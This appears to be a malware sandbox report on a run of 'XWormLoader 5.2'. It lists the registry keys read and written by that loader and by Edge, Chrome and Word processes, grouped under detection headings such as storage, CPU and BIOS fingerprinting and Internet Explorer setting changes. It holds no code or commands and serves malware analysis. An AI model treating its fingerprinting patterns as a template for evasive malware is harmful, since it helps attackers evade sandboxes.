File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\124.0.2478.105\Trust Protection Lists\Mu\Fingerprinting C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\wermgr.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\wermgr.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\wermgr.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\wermgr.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\wermgr.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\system32\wwahost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29} C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\system32\wwahost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\ProtocolExecute\microsoft-edge C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Software\Microsoft\Internet Explorer\TypedURLs C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\Main\EnterpriseMode C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\EnterpriseMode\MSEdgePath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\BHO" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations\C:\Program Files (x86)\Microsoft\Edge\Application = "1" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppName = "ie_to_edge_stub.exe" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\ProtocolExecute C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Internet Explorer\EdgeIntegration\AdapterLocations C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\ = "IEToEdge Handler" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\Policy = "3" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{c9abcf16-8dc2-4a95-bae3-24fd98f2ed29}\AppPath = "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\124.0.2478.105\\BHO" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133603380950088431" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge\InstallerPinned = "0" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Edge C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\13\Shell C:\Users\Admin\Desktop\XWorm V5.2\XWormLoader 5.2 x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ie_to_edge_bho.IEToEdgeBHO\CurVer\ = "ie_to_edge_bho.IEToEdgeBHO.1" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B54934CD-71A6-4698-BDC2-AFEA5B86504C}\InprocServer32\ThreadingModel = "Apartment" C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\.pdf\OpenWithProgids C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{5CA352B5-53F7-4525-9241-D14C8DE4FB33}\EDGEMITMP_229F7.tmp\setup.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B5977F34-9264-4AC3-9B31-1224827FF6E8}\ProgID C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3805CA06-AC83-4F00-8A02-271DCD89BDEB}\ProxyStubClsid32 C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{EA92A799-267E-4DF5-A6ED-6A7E0684BB8A}\ProgID\ = "MicrosoftEdgeUpdate.Update3WebSvc.1.0" C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FEA2518F-758F-4B95-A59F-97FCEEF1F5D0}\ProxyStubClsid32\ = "{4E50ED6A-8A46-4CB9-9E77-B99CBFED1E68}" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.37\\psmachine_64.dll" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E4518371-7326-4865-87F8-D9D3F3B287A3}\NumMethods\ = "4" C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.187.37\MicrosoftEdgeUpdateComRegisterShell64.exe N/A
